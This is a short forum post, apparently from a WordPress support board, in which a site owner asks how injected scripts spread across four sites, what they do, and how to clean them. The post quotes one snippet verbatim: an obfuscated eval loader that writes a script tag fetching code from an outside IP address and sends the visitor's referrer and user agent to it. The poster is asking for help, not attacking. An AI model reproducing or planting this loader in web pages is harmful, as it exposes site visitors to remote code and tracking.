Malicious JavaScript… How did it multiply and what is it trying to do?

I host four WordPress sites on my server and keep finding little snippets like this one peppered into just about any body of text (usually one per post or page) on my sites.

I have since changed all passwords to the strong sting of characters that WordPress generates, but I still have some questions.

    How did these get onto my sites?
    What is the purpose of this code?
    How can I make sure my sites are truly free of these scripts?

id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g='2' c='d' e='b/2' 4='7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kinbb|var|u0026u|referrer|ryfrk||js|php'.split('|'),0,{}))<br />

  • This topic was modified 42 minutes ago by Buca.



Source link